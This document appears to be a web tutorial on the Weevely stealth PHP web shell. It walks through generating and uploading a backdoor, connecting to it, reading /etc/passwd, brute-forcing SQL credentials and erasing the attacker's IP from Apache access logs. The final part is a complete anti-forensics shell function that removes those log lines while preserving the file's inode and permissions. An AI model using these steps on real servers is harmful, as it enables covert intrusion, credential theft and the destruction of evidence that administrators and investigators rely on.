Weevely is a stealth PHP web shell designed for remote server administration and penetration testing.
It simplifies the administration of a web account, especially an unprivileged one such as those on free hosting services and other shared environments. It is useful for post-exploitation tasks such as privilege escalation and maintaining access, even in restricted environments, and it can be used as a stealth backdoor.
- Ssh-like terminal
- SQL console pivoted on target
- HTTP proxy pivoted on target
- Host configuration security auditing
- Mount of the remote filesystem
- Network scan pivoted on target
- File upload and download
- Reverse and direct TCP shell
- Meterpreter support
- Service account brute force
- Compressed archive management
Install the build dependencies first, then the Python modules weevely needs (these are the Python 2 package names used by the original post; on a current Debian or Kali system use python3-pip, python3-dev and pip3 instead):
root@cybarrior:~# apt-get install g++ python-pip libyaml-dev python-dev
root@cybarrior:~# pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade
Generate a backdoor
root@ddos:~# weevely generate ddos ddos.php
Generated backdoor with password 'ddos' in 'ddos.php' of 1439 byte size.
The new file sits alongside weevely's own sources in the working directory:
bd core ddos.php modules utils weevely.py
The agent then has to be uploaded to the target, which usually takes some upload-bypass technique such as a double extension, bypassing image-type validation, or bypassing a whitelist/blacklist.
Connect to the backdoor
Pass the URL of the uploaded agent and the password chosen at generation time:
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Guess the SQL user credentials
The bruteforce_sql module tries to guess the credentials of one or more SQL users. Its options are listed with:
weevely> bruteforce_sql --help
Clear your traces from the logs
This section shows how to remove the records of your activity from the server's logs.
First use the system_info command to find the address the server sees you connecting from:
www-data@ddos:/var/log $ system_info -info client_ip
Use grep to confirm that this address appears in the Apache access log (substitute the address system_info reported):
www-data@ddos:/var/log/apache2 $ grep "192.168.1.8" /var/log/apache2/access.log.1
The output shows that requests from our address have been recorded. Use grep -v to drop those lines and write everything else to a temporary file:
www-data@ddos:/var/log/apache2 $ grep -v "192.168.1.8" /var/log/apache2/access.log.1 > cleaned.log
Run the first grep again against cleaned.log to check that no line for the address remains.
Then write cleaned.log back over access.log.1. Overwrite the file in place with a redirect rather than moving the temporary file over it, so the log keeps its original inode, owner and permissions, and remove cleaned.log afterwards. Note that this only works if the log file is writable by the account you are running as: Apache logs are normally owned by root and readable only by the adm group, so as www-data this step usually fails until privileges have been escalated. Also note that a plain grep for "192.168.1.8" matches 192.168.1.80 and similar addresses as well, so check what you are removing.
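The log-cleaning steps above, as one shell function. This is an added example, not code from the original post or from weevely itself; the sample log lines, the file names and the function names are constructed for the example. It handles two details the walkthrough glosses over: the address is compared as a whole field, so 192.168.1.8 does not also drop 192.168.1.80, and the result is written back in place so the file keeps its inode, owner and mode.

```shell
#!/bin/sh
# Added example, not code from the original post or from weevely itself.
# Reproduces the grep -v / replace steps as one function with the edge
# cases handled: whole-field IP match, in-place overwrite, write check.

# scrub_ip_from_log LOGFILE IP
# Removes every line of LOGFILE whose first field (the client address in
# Apache's common/combined log format) equals IP.
scrub_ip_from_log() {
    log="$1"
    ip="$2"

    # Apache logs are normally root:adm 0640; an unprivileged web-server
    # account cannot rewrite them, so fail loudly instead of silently.
    [ -w "$log" ] || { echo "not writable: $log" >&2; return 1; }

    tmp="$(mktemp)" || return 1
    # awk compares the whole first field, unlike grep -v "1.2.3.4", which
    # would also match 1.2.3.40 or the same digits in some other field.
    awk -v ip="$ip" '$1 != ip' "$log" > "$tmp"

    # Overwrite through a redirect rather than mv: the file keeps its inode,
    # so a daemon that still has it open keeps writing to the same file,
    # and ownership and permissions are unchanged.
    cat "$tmp" > "$log"
    rm -f "$tmp"
}

# count_ip_in_log LOGFILE IP -> prints how many lines for IP remain
count_ip_in_log() {
    awk -v ip="$2" '$1 == ip { n++ } END { print n + 0 }' "$1"
}

# demo_scrub: builds a constructed four-line sample log (addresses and
# requests are made up for this example), scrubs 192.168.1.8 from it and
# prints "<lines left for 192.168.1.8> <lines left for 192.168.1.80> <total>".
demo_scrub() {
    sample="$(mktemp)"
    cat > "$sample" <<'EOF'
192.168.1.8 - - [10/Oct/2023:13:55:36 +0000] "GET /ddos.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.80 - - [10/Oct/2023:13:55:37 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:38 +0000] "POST /ddos.php HTTP/1.1" 200 256 "-" "curl/7.88.1"
192.168.1.8 - - [10/Oct/2023:13:55:39 +0000] "POST /ddos.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
    scrub_ip_from_log "$sample" 192.168.1.8
    echo "$(count_ip_in_log "$sample" 192.168.1.8) $(count_ip_in_log "$sample" 192.168.1.80) $(wc -l < "$sample" | tr -d ' ')"
    rm -f "$sample"
}

demo_scrub   # prints: 0 1 2
```

The first-field comparison assumes the default common/combined log format; behind a reverse proxy the real client address is usually logged from X-Forwarded-For in a different field, so check the LogFormat before relying on it. Scrubbing the access log also leaves error.log, other rotated files and the file's changed size and mtime untouched, all of which a defender can notice.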